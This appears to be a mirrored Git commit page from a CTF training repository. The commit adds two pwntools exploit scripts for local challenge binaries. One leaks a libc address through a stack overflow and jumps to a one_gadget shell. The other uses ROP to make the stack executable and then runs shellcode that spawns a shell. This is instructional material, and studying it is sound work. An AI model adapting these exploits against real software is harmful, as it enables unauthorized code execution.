nganhkhoa/CTF-All-In-One
1
0
Fork 0
mirror of https://github.com/nganhkhoa/CTF-All-In-One.git synced 2025-06-24 04:05:03 +07:00
Code Issues Projects Releases Wiki Activity

add mprotect

Browse Source
This commit is contained in:
firmianay
2020-09-01 18:10:54 +08:00
parent 86aa068b6f
commit eb1e60345a
7 changed files with 328 additions and 2 deletions
Download Patch File Download Diff File Expand all files Collapse all files

29
src/others/4.11_mprotect/exp1.py Normal file
View File

@ -0,0 +1,29 @@
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
io = process('./pwn1')
elf = ELF('./pwn1')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
pop_rsi_r15 = 0x400611
pop_rdi = 0x400613
write = 0x400595
payload = "A"*0x88 + p64(pop_rsi_r15) + p64(elf.got['write'])*2 + p64(write)
io.sendlineafter('welcome~\n', payload)
write_addr = u64(io.recv(8))
io.recv()
libc_addr = write_addr - libc.sym['write']
one_gadget = libc_addr + 0x4527a
print hex(libc.sym['write']), hex(write_addr), hex(libc_addr), hex(one_gadget)
payload = "A"*0x88 + p64(one_gadget)
io.sendline(payload)
io.interactive()

31
src/others/4.11_mprotect/exp2.py Normal file
View File

@ -0,0 +1,31 @@
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
io = process('./pwn2')
elf = ELF('./pwn2')
vul = 0x4009E7
write = 0x4009DD
pop_rdi = 0x4014c6
pop_rsi = 0x4015e7
pop_rdx = 0x442626
jmp_rsi = 0x4a3313
mov_rdi_esi = 0x47a3b3
payload = "A"*0x88
payload += p64(pop_rsi) + p64(7) + p64(pop_rdi) + p64(elf.sym['__stack_prot']) + p64(mov_rdi_esi)
payload += p64(pop_rdi) + p64(elf.sym['__libc_stack_end']) + p64(elf.sym['_dl_make_stack_executable'])
payload += p64(vul)
#gdb.attach(io)
io.sendlineafter('welcome~\n', payload)
shellcode = asm(shellcraft.sh())
payload = shellcode.ljust(0x88, "A") + p64(jmp_rsi)
io.sendline(payload)
io.interactive()

BIN
src/others/4.11_mprotect/pwn1 Normal file
View File

Binary file not shown.

BIN
src/others/4.11_mprotect/pwn2 Normal file
View File

Binary file not shown.